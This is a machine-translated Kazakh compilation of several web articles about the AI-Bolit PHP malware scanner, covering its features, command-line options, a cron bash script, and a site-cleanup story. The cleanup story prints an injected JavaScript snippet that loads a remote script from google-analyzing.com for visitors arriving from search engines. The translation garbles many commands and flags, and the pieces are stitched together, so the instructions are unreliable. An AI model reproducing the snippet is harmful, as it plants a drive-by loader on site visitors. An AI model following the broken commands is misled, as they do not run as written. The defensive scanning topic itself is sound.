Пәрмен жолынан AI-BOLIT сканерімен қалай жұмыс істеу керек. AI-Bolit - AI-Bolit хостингіндегі тиімді вирус және басқа зиянды код сканері

Жағымсыз жағдайлар бізді таң қалдырады. Кейде кейбір пайдаланушылар өздерінің сайттарында осалдықтары бар бағдарламалық құралды орнатады. Немесе шабуылдаушылар «тесіктерді» табады бағдарламалық қамтамасыз етуол еркін таратылады. Мұндай «тесіктерді» тапқаннан кейін хакерлер жәбірленушінің аккаунтын пайдаланып, зиянды енгізе бастайды бағдарламалау коды, хакерлер қабықшаларының, бэкдорлардың, спам-пошталардың және басқа да зиянды сценарийлердің барлық түрлері.

Өкінішке орай, кейбір пайдаланушылар өз сайттарындағы бағдарламалық жасақтаманы уақытында жаңартпай, осындай зиянкестердің құрбанына айналады.

Мәселенің мәні

Біздің серверлік бағдарламалық құрал көп жағдайда зиянды жүктемені анықтайды және «жаман» әрекетті автоматты түрде жояды.

Зиянды бағдарлама нақты не істейді? Әртүрлі нәрселер: ол спам жібереді, басқа ресурстарға шабуылдарға қатысады және т.б. Мұндай вирустардың ең жарқын мысалдарының бірі «MAYHEM - *NIX серверлеріне арналған көп мақсатты бот». Бұл вирус, мысалы, Яндекс мамандары өз блогында немесе

Hostland үнемі өз тұтынушыларын жаңа антивирус құралдарымен қуантады!

Біз сізге өзіңіздің тіркелгіңіздегі вирустарды, зиянды және хакерлік сценарийлерді, қолтаңбалар мен икемді үлгілерге негізделген қабықшаларды, қарапайым эвристикаға негізделген қабықтарды - кәдімгі антивирустар мен сканерлер таба алмайтындардың барлығын іздеудің өте ыңғайлы және тегін құралын ұсынамыз.

Біз «Revizium» компаниясынан «AI-Bolit» пайдаланушымызды ұсынамыз.

AI-Bolit сканерінің мүмкіндіктері:

• Хакер PHP және Perl сценарийлерін (қабықтар, бэкдорлар), вирустық кірістірулерді, есіктерді, спам жіберулерді, сілтемелерді сату сценарийлерін, жасырын сценарийлерді және зиянды сценарийлердің басқа түрлерін іздеңіз. Үлгі іздеу және тұрақты тіркестер, сондай-ақ ықтимал зиянды кодты анықтау үшін қарапайым эвристиканы пайдалану
• Маңызды осалдықтары бар сценарийлерді іздеу (timthumb.php, uploadify, fckeditor, phpmyadmin және т.б.)
• php (.sh, .pl, .so, т.б.) сайттарына тән емес сценарийлерді іздеңіз.
• Шифрланған, фрагменттелген мәтін блоктары мен кодталған он алтылық/окт/дек реттіліктеріндегі қолтаңбаларды іздеу
• Зиянды сценарийлерде қолданылатын құрылымдары бар күдікті файлдарды іздеңіз
• Файлдардан жасырын сілтемелерді табу
• Іздеу символдық сілтемелер
• Іздеу және мобильді қайта бағыттау үшін кодты табу
• auto_prepend_file/auto_apppend_file, AddHandler сияқты қосылымдарды іздеңіз
• iframe кірістірулерін іздеңіз
• cms нұсқасы мен түрін анықтау
• Іздеу жасырын файлдар
• Қос кеңейтілімі бар .php файлдарын, GIF кескіні ретінде жүктеп салынған .php файлдарын іздеңіз
• Күдікті көп php/html файлдары бар есіктер мен каталогтарды іздеңіз
• Орындалатын екілік файлдарды іздеңіз
• Есептегі файлдар тізімдерін ыңғайлы сүзу және сұрыптау
• Орыс тіліндегі интерфейс

Тағы нені білу маңызды?

Егер тіркелгіңізде AI-Bolit көмегімен зиянды бағдарламалық құрал табылса, бұл файлдарды жай ғана жою сайтыңыздың осалдығын шешпейді.

Сіз хакер сіздің сайтыңызға «жаман» сценарийді қалай енгізе алатынын білуіңіз керек, оның бағдарламалық жасақтамасынан «тесік» табуыңыз керек. Кейде бұл құпия сөздерді өзгертуді қажет етеді FTP қатынасы, «сайт қозғалтқышын» жаңартыңыз, кейде сервер журналының файлдарын зерттеу қажет (егер олар өшірілген болса, оларды қосыңыз), кейде сізге үшінші тарап қауіпсіздік маманын тарту қажет.

Жоғарыда аталған шаралардың бүкіл кешені сіздің сайтыңыздың қауіпсіздік мәселесін шешуге ең жақсы көмекші болады!

Барлық зиянды сценарийлерді анықтауға кепілдік беру мүмкін емес. Сондықтан сканерді әзірлеуші ​​және хостинг провайдері AI-Bolit сканерінің жұмысы кезінде жалған позитивтердің ықтимал салдары немесе функционалдылық пен мүмкіндіктерге қатысты негізсіз пайдаланушы күтулері үшін жауапты емес.

Сценарий жұмысы бойынша пікірлер мен ұсыныстарды, сондай-ақ анықталмаған зиянды сценарийлерді жіберуге болады. [электрондық пошта қорғалған]

Ең үлкен функция AI-BOLIT сканерін іске қосқанда қол жетімді пәрмен жолы. Мұны Windows/Unix/Mac OS X жүйесінде де, SSH рұқсатыңыз болса және хостинг тұтынылатын процессор ресурстарын қатты шектемесе, тікелей хостингте де жасауға болады.

Сканерді іске қосу үшін PHP 7.1 және одан жоғары консоль нұсқасы қажет екенін ескеріңіз. Көбірек ерте нұсқаларыресми түрде қолдау көрсетілмейді. Ағымдағы нұсқаны php -v пәрменімен тексеріңіз

AI-BOLIT сканерінің пәрмен жолы параметрінің анықтамасы

Көмек көрсету

php ai-bolit.php --анықтама

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Тек арнайы кеңейтімдерді сканерлеңіз

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,күдікті,tpl

Қауіпсіздік мамандарына жіберу үшін карантиндік файлды дайындаңыз. AI-QUARANTINE-XXXX.zip мұрағаты құпия сөзбен жасалады.

php ai-bolit.php --карантин

Сканерді «параноидтық» режимде іске қосыңыз (ең егжей-тегжейлі есеп алу үшін ұсынылады)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Зиянды код үшін бір "pms.db" файлын тексеріңіз

php ai-bolit.php-jpms.db

512 Мб жады өлшемі бар сканерді іске қосыңыз

php ai-bolit.php --memory=512M

Орнату максималды өлшемтексерілген файл 900Kb

php ai-bolit.php --size=900K

Сканерлеу кезінде файлдар арасында 500 мс үзіліс (жүктемені азайту үшін)

php ai-bolit.php --delay=500

Сканерлеу есебін электрондық пошта арқылы жіберіңіз [электрондық пошта қорғалған]

php ai-bolit.php --report= [электрондық пошта қорғалған]

/home/scanned/report_site1.html ішінде есеп жасаңыз

php ai-bolit.php --report=/home/scanned/report_site1.html

/home/s/site1/public_html/ каталогын сканерлеңіз (егер --report=report_file опциясы орнатылмаған болса, есеп әдепкі бойынша осы каталогта жасалады)

php ai-bolit.php --path=/home/s/site1/public_html/

Сканерлеу аяқталған кезде пәрменді орындаңыз.

php ai-bolit.php --cmd="~/postprocess.sh"

site1.txt деп аталатын кәдімгі мәтіндік есепті алыңыз

php ai-bolit.php-lsite1.txt

Сіз қоңырауларды біріктіре аласыз, мысалы,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,күдікті

AI-BOLIT сканерінің шақыруын басқа unix пәрмендерімен біріктіру арқылы, мысалы, сайттарды пакеттік тексеруді орындауға болады. Төменде тіркелгі ішінде орналастырылған бірнеше сайттарды тексерудің мысалы берілген. Мысалы, сайттар /var/www/user1/data/www каталогында орналасса, сканерді іске қосу пәрмені болады.

табу /var/www/user1/data/www -maxdepth 1 -түрі d -exec php ai-bolit.php --path=() --mode=2 \;

--report опциясын қосу арқылы сканерлеу есептері жасалатын каталогты басқаруға болады.

php ai-bolit.php параметрлер тізімі ... --kaz

Есеп интерфейсін ағылшын тіліне ауыстырыңыз. Бұл параметр соңғы болуы керек.

Басқа қызметтермен және хостинг тақтасымен интеграция

php ai-bolit.php --json_report=/path/file.json

json пішімінде есеп жасаңыз

php ai-bolit.php --progress=/path/progress.json

Чек күйін json пішіміндегі файлға сақтаңыз. Бұл файл json пішіміндегі құрылымдық деректерді қамтиды: ағымдағы сканерлеу файлы, қанша файл сканерленді, сканерлеуге қанша файл қалды, сканерлеу пайызы, сканерлеу аяқталғанға дейінгі уақыт. Бұл механизмді орындалу жолағын және панельде тексерілетін файлдар туралы деректерді көрсету үшін пайдалануға болады. Сканерлеу аяқталғаннан кейін файл автоматты түрде жойылады.

php ai-bolit.php --handler=/path/hander.php

Сыртқы оқиға өңдеушісі. Сканерлеу/сканерлеу барысы/сканерлеу қателерін бастау/тоқтату үшін өзіңіздің өңдеушілеріңізді қосуға болады. Мысал файлды сканер мұрағатында, tools/handler.php каталогында табуға болады. Мысалы, сканерлеу аяқталғаннан кейін есеп файлымен бірдеңе жасауға болады (оны пошта арқылы жіберу, мұрағатқа жинау және т.б.).

Сайттарды жасайтын әрбір адам сайтта вирустар мен трояндарға тап болған шығар. Бірінші мәселе - жобалар іздеу жүйелерінен пессимизм немесе хосттерге жүктеме (ddos, спам) болғанға дейін мәселені дер кезінде байқау.

Бұл мақала Windows операциялық жүйесіндегі құрылғыға қалыпты сақтық көшірме жасау кезінде ESET сайтының дереккөздерін іздестіру мақсатында жазылуда. ақылды қауіпсіздіккенеттен ол вирус деп санаған суреттерге ант ете бастады. Анықталғандай, суреттердің көмегімен FilesMan бэкдоры сайтқа толып кеткен.

Тесік пайдаланушыларға сайтқа суреттерді жүктеуге мүмкіндік беретін сценарий суреттің тек файл кеңейтімі арқылы жүктелгенін тексерді. Мазмұн мүлде тексерілмеген. Мұны істеудің қажеті жоқ;) Нәтижесінде кез келген php файлы сайтқа сурет атын жамылып жүктелуі мүмкін. Бірақ бұл тесіктер туралы емес ...

Мәселе мынада, күн сайын барлық сайт файлдарын вирустар мен трояндарға тексеру міндеті болды.

Интернетте вирус бар-жоғын сайтты тексеру

Интернетте вирустарға арналған сайттарды тексерудің барлық түрлері бұл мақсаттарға сөзден мүлдем сәйкес келмейді. Онлайн тексеріп шығушылар сайттың барлық қол жетімді беттерін дәйекті түрде өтіп, іздеу жүйесінің роботы сияқты әрекет етеді. Сайттың келесі бетіне өту сайттың басқа беттеріндегі сілтемелер арқылы жүзеге асырылады. Жауап. егер шабуылдаушы суретті пайдаланып сайтыңызға бэкдорды жүктеп салса және бұл суретке сайт беттерінің ешбір жерінде сілтеме болмаса және сайтты бұзбаса, парақтарға вирус іліп қойғандай, сайтты вирустарға онлайн тексеру жай ғана бұл суретті таба алмайды және вирусты таба алмайды.

Неліктен шабуылдаушы мұны жасайды деп сұрайсыз? Неліктен бэкдорды жүктеп салып, ештеңе жасамайсыз? Мен жауап беремін - спам үшін, ddos ​​үшін. Сайт беттеріне ешқандай әсер етпейтін басқа зиянды әрекеттер үшін.

Бір сөзбен айтқанда, сайтты вирустарға онлайн тексеру толық тыныштық үшін мүлдем пайдасыз.

WordPress сайтында вирустар мен трояндарды тексеру үшін плагин

WordPress үшін тамаша антивирустық плагин бар. деп аталады. Менің жағдайда, ол FilesMan-дан суреттерді тапты және сайтты вирустардан тазартты. Бірақ оның маңызды кемшілігі бар. Тексеру кезінде ол серверге жабайы жүктеме береді, өйткені ол барлық файлдарды ретімен сұрыптайды. Сонымен қатар, қораптан шығу тек қолмен жасалады. Плагин арқылы сайтты тексеруді автоматтандыру мүмкін емес.

Сіз WordPress-ті айналып өтіп, вирусты ұстай аласыз, сізге әмбебап нәрсе керек.

Сайттың мазмұнын кәдімгі антивируспен тексеру

Жоғарыда айтылғандай, сақтық көшірме жасау кезінде ақаулықтарды кәдімгі жұмыс үстелі антивирусы кездейсоқ тапты. Әрине, сіз күн сайын бүкіл сайтты жүктеп алып, оны әдеттегі антивируспен тексере аласыз. Мұның бәрі өте тиімді.

• Біріншіден, мен автоматтандыруды қалаймын. Осылайша, тексеру автоматты режимде болды және нәтижелер бойынша дайын есеп болды.
• екіншіден, мұндай сайттар бар, оларды күнделікті жүктеп алу мүмкін емес,

AI-Bolit қолданылуда

Кіріспемен бірдеңені қатайттым. Барлық ізденістердің нәтижесінде мен керемет таптым ТЕГІН антивируссайт үшін. . Бұл антивирус оны пайдаланудың әртүрлі схемаларын білдіреді. Мен оны ssh арқылы қолдандым.

Ортақ хостингте қолдануға болады ма - түсінбедім, бірақ мүмкін деп ойлаймын. AI-Bolit php тілінде жазылған және оны браузерден іске қосуға болады. Сондықтан, таза техникалық, мүмкін, ортақ платформада мүмкін.

Маңызды! Aibolit вирустар сайтын емдемейді - ТЕК ТАБАДЫ және ол қауіпті деп санайтын файлдарды хабарлайды. Ал сіз олармен не істеу керектігін шешесіз. Сондықтан, жай ғана түймені басу және сайтты трояндардан емдеу жұмыс істемейді.

Ssh көмегімен VDS-де AI-Bolit қалай пайдалануға болады

Aibolit-те осы антивирусты пайдалану бойынша нұсқаулар мен шеберлік сабақтары бар. Жалпы, реттілік қарапайым:

• жүктеп алу
• серверге орау (мен/root/ai бумасынан шығардым)
• содан кейін ssh консолінен php /root/ai/ai-bolit/ai-bolit.php іске қосыңыз
• тексеру сайттың өлшеміне байланысты бірнеше сағатқа созылуы мүмкін
• тексеру нәтижелері бойынша AI-BOLIT-REPORT- есеп файлы құрылады<дата>-<время>.html

Мәселелі файлдар, егер бар болса, есеп файлында көрінеді.

Серверде жоғары жүктеме

Сіз кездесетін басты мәселе автоматты тексерувирустарға арналған сайт сервердегі жүктеме болып табылады. Барлық антивирустар бірдей әрекет етеді, барлық қолжетімді файлдарды ретімен сұрыптайды. Ал айболит бұл жерде ерекшелік емес сияқты. Ол жай ғана барлық файлдарды алып, оларды бір-бірден тексереді. Жүктеме секіреді және ол ұзақ уақытқа созылуы мүмкін, бұл өндірісте қабылданбайды.

Бірақ aibolit-тің керемет мүмкіндігі бар (егер сізде толыққанды сервер немесе түбірлік рұқсаты бар vds болса). Біріншіден, aibolit үшін сіз тексерілетін файлдар тізімін жасай аласыз, содан кейін осы тізімді бере аласыз. Сонда айболит бұл тізімді жай ғана айналып өтеді.

Тізімді қалыптастыру үшін кез келген сервер әдістерін пайдалануға болады. Мен бұл bash сценарийін алдым:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="веб-сайт" AI_PATH="/root/ai" ҚАЗІР=$(күн +" %F-%k-%M-%S") # құпия сөзге қол жеткізу астында жалпы қалта жасауға болады REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Тек X жүйесінде өзгертілген файлдарды сканерлеңіз күн # AI-BOLIT-DOUBLECHECK.php aibolit авторы --with-2check деп қатты кодтаған !!! $SCAN_PATH -түрі f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #табыңыз $SCAN_PATH -түрі f -аты "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #табу $SCAN_PATH -түрі f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #табу $SCAN_PATH -түрі f -аты "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

Мұнда табу пәрмені арқылы біз соңғы SCAN_DAYS ішінде жасалған барлық файлдарды жинайтынымызды, оларды AI-BOLIT-DOUBLECHECK.php тізіміне сақтайтынымызды көре аласыз (өкінішке орай, пайдалану кезінде тізім файлының атын өзгерту мүмкін болмады), онда біз бұл тізімді аиболитке береміз. SCAN_DAYS бір күнге тең болуы мүмкін. Күнделікті cron ішіне bash /root/ai/run.sh қойсаңыз, тексерілетін файлдар тізімі өте үлкен болмауы мүмкін. Жауап. тексеру көп уақытты қажет етпейді және серверді қатты жүктемейді.

AI-Bolit - хостингтегі вирустар мен басқа зиянды кодтардың тиімді сканері

Бізге жиі сұрақ қояды – AI-Bolit сканерінің бірегейлігі неде? Оның maldet, clamav немесе тіпті жұмыс үстелі антивирустары сияқты басқа ұқсас зиянды бағдарламаларды анықтау құралдарынан айырмашылығы неде? Қысқа жауап: PHP және Perl тілдерінде жазылған зиянды кодты анықтау жақсы. Неліктен? Төменде жауап беріңіз.

Күн сайын зиянды код (хакерлердің веб қабықшалары, бэкдорлар және т.б.) күрделірек және күрделі бола түседі. Идентификаторларды жасыру және кодты шифрлаудан басқа

жасырын функция шақырулары шақырылатын аргументтер, өңдеушілер және жанама функция шақырулары бар әдістер арқылы барлық жерде қолданыла бастады.

Сызықтық құрылымы мен бекітілген идентификаторлары бар зиянды сценарийлер азайып барады. Олар кодты жасырып, оны мүмкіндігінше құбылмалы, «полиморфты» етуге тырысады.

немесе керісінше, оны мүмкіндігінше қарапайым етіп жасаңыз және әдеттегі сценарийге ұқсаңыз.

Кейде зиянды сценарийді талдау кезінде тіркелген фрагментті оқшаулау мүмкін емес, оның көмегімен «зиянды бағдарламаны» бірегей анықтауға болады. Әлбетте, мұндай зиянды кодты қарапайым қолтаңба дерекқорының көмегімен табу мүмкін емес ( антивирустық мәліметтер базасы), ол веб-антивирустардың және орналастырылған сканерлердің басым көпшілігінде қолданылады. Заманауи «зиянды бағдарламаны» тиімді іздеу үшін вирус үлгілерін анықтаудың күрделі әдістерін, ал кейбір жағдайларда эвристиканы қолдану қажет. Бұл AI-BOLIT зиянды бағдарлама сканерінде қолданатын әдіс.
Қосымша қолдану арқылы тұрақты өрнектерге негізделген икемді үлгілердің үнемі жетілдірілетін үлкен дерекқорын пайдалану эвристикалық талдау, вирус жұқтырған көптеген сайттарды сканерлеу негізінде әзірленген AI-Bolit сканерін әкімшілер мен веб-әзірлеушілер үшін ең тиімді және белсенді қолданылатын құралға айналдырды.

AI-Bolit сонымен қатар қарапайым интерфейсімен және коммерциялық емес мақсаттарда тегін пайдалану мүмкіндігімен кеңінен танымал. Кез келген веб-шебер AI-Bolit-ті http://revisium.com/ai/ ресми веб-сайтынан мүлдем тегін жүктей алады және оның ресурсын хакерлер қабықшалары, бэкдорлар, есіктер, вирустар, спам-хабарламалар, жасырын сілтемелер және басқа зиянды фрагменттер мен кірістірулер бар-жоғын тексере алады. Сканерді коммерциялық компаниялар да белсенді пайдаланады - веб-студиялар, хостинг компаниялары және интернет агенттіктері клиенттік сайттарды тексеру және өңдеу үшін. Хостер AI-Bolit-ті басқару панеліне біріктіреді, веб-әзірлеушілер оны зиянды кодты іздеу үшін және өздерінің сайтты бақылау қызметтерінде пайдаланады.

Төменде Ai-Bolit сканерінің мүмкіндіктерінің шағын тізімі берілген:

• консольден және браузерден іске қосыңыз
• үш сканерлеу режимі («қарапайым», «сарапшы», «параноидтық») және екі жұмыс режимі («экспресс» және «толық сканерлеу»)
• хакерлік php және perl сценарийлерін (қабықтар, бэкдорлар), вирустық кірістірулерді, есіктерді, спам жіберулерді, сілтемелерді сату сценарийлерін, жасырын сценарийлерді және зиянды сценарийлердің басқа түрлерін іздеу. Үлгі мен тұрақты өрнекті іздеу және ықтимал зиянды кодты анықтау үшін эвристиканы пайдалану
• шифрланған, фрагменттелген мәтіндік блоктар мен кодталған он алтылық/окт/дек реттіліктеріндегі қолтаңбаларды іздеу
• зиянды сценарийлерде қолданылатын құрылымдары бар күдікті файлдарды іздеу
• файлдардағы жасырын сілтемелерді іздеу
• символдық сілтемелерді іздейді
• іздеу және мобильді қайта бағыттау үшін іздеу коды және т.б.

Ресми сценарий беті

Бүгін маған интернет-дүкенді вирустардан тазартуға көмек сұрады. Күтпеген жерден қызметкерлердің бірі Google Adwords-ті жарнамалаудан бас тартты. Хат файл екенін көрсетті jquery.jsкүдікті код тіркелді.

Біріншіден, мен бұл файлға жолды браузер арқылы аштым, бірақ Avast антивирусы ешқандай әрекет жасамады. берілген файл, визуалды түрде мен зиянды кодты көрдім. Содан кейін мен FileZilla арқылы ftp арқылы қосылып, файлды Notepad++ арқылы ашуға тырыстым. Міне, менің антивирусым осы файлға кіруге тыйым салды.

Js файлын вирустан тазарту үшін AVAST-ты 10 минутқа өшіріп, содан кейін файлдағы зиянды жолдарды жоюға тура келді.

Ұқсас мәселеге тап болсаңыз, суретте көрсетілгендей келесі кодты немесе осы жолдарды алып тастаңыз.

Varr=document.referrer; var c=document.cookie; r1=0; егер ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" mail")>0)) ( document.cookie = "__ga1=1; expires=Ср, 1 наурыз 2020 ж. 00:00:00; path=/;"; r1=1; ) басқа (егер (c.indexOf(") __ga1")==-1)(document.cookie = "__ga2=1; аяқталады=Сәр, 1 наурыз 2020 ж. 00:00:00; жол=/;";)) егер (((c.indexOf("__ga1") )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-analyzing" .com/urchin.js" type="text/javascript"%3E%3C/script%3E");)

Сайттың сақтық көшірмесі.

Әрі қарай, біз ssh қатынасы арқылы қосыламыз, мысалы, putty утилитасын пайдаланып, мүмкін болса, сайттың мұрағатын жасаймыз. Мұны істеу үшін консольде келесі пәрменді пайдаланыңыз:

tar - cf сақтық көшірмесі .tar /home/login/site/public_html

Сайттың сақтық көшірмесін жасаудың қажеті жоқ, бірақ маңызды нәрсені жойғаныңызды білмейсіз бе?

Енді сайтта вирустарды тексерудің екі нұсқасы бар

1. Әртүрлі вирустарды, сондай-ақ PHP қабығын іздейтін Ai-Bolit PHP сценарийі арқылы сайтты тексеру.

2. Толық сайтты компьютеріңізге жүктеп алып, Avast антивирусын іске қосыңыз, бірақ бірінші нұсқа әлдеқайда жақсырақ, ыңғайлы және әлдеқайда жақсы.

Жергілікті компьютерде сайтты тазалау

Алдымен мен екінші әдісті қолдандым, сондықтан мен оны сипаттаймын. Барлық файлдар (немесе мұрағат) компьютерге жүктелгеннен кейін және олардың 25 000-нан сәл астамы бар, мен Avast аштым және зиянды сценарийлердің бар-жоғын тексеру үшін сайт файлдары бар қалтаны көрсеттім.

Avast сканерлеуді орындағаннан кейін веб-сайттың файлдар қалтасында екі сценарий вирусы табылды:

• php-shell-jv
• js-redirector-fc

index.php файлы келесі кодтан тұрды:

"ui.datepicker_old.js" JavaScript файлында сценарий мазмұнының ең төменгі жағында зиянды код болды. Бұл кодты жою керек!

Ai-Bolit көмегімен сайтты вирустардан тазарту.

ftp жолы.

1. Мұрағатты Айболит сценарийі қосулы жүктеп алыңыз жергілікті компьютержәне оны орауыштан шығарыңыз.

2. FileZilla клиенті арқылы ftp арқылы қосылыңыз

3. Бумадан шығарылған мұрағат файлдары /home/сайтыңыз/public_html сайтының негізгі каталогында орналастырылады.

4. http://your domain/ai-bolit.php сценарийін іске қосыңыз

5. Есеп файлы атымен негізгі каталогта жасалады AI-BOLIT-REPORT.html

Егер сценарийді іске қосқаннан кейін бос ақ экран көрсетілсе, онда хостинг серверіндегі PHP нұсқасы Aibolit үшін жарамсыз.

Назар аударыңыз!Каталогтағы барлық сайттарды тексеру қажет болса, сценарийді /home/domains/ немесе /home/ қалтасына жүктеңіз, содан кейін Ai-Bolit рекурсивті түрде барлық қалталарды аралап, есеп береді, бірақ менің ойымша, тексерген дұрыс. бір домен үшін.

Консоль опциясы (SSH)

1. Putty бағдарламасын немесе басқа консольдық бағдарламаны іске қосыңыз.

2. Біз серверге хост және пароль арқылы қосыламыз.

3. Команда арқылы сайттың негізгі каталогына өтіңіз cd /үй/логин/сайтыңыз/public_html/

4. Сценарийді пәрменмен жүктеңіз wget http://www..zip

5. Орамнан шығарыңыз zip мұрағатыкоманда 20160904_112415ai-bolit.zip файлын ашыңыз

6. Сценарийді іске қосыңыз php ai-bolit.php

Жүгіру үшін фонпәрменді пайдаланыңыз: экран -d -m php ai-bolit.php

7. Сценарийдің тексеруді орындауын және " сияқты есепті құруды күтеміз. AI-BOLIT-REPORT.html"серверде.

Сондай-ақ назар аударыңыз, егер PHP серверіңізде 5.3-тен төмен орнатылған болса, Aibolit қатені көрсетеді және сканерлеуді бастамайды. Менің жағдайда сайтты жүктеп алып, оны серверімде тексеруге тура келді.

Есеп файлы серверде жасалғаннан кейін оны компьютерге жүктеп алып, оны кәдімгі браузер арқылы (Chrome, Firefox, т.б.) көруге болады.

Ең алдымен, сіз «Зиянды сценарийлер» туралы есепке назар аударуыңыз керек, содан кейін бұл файлдарды мұқият жойыңыз немесе мен сияқты оларды қолмен тазалаңыз.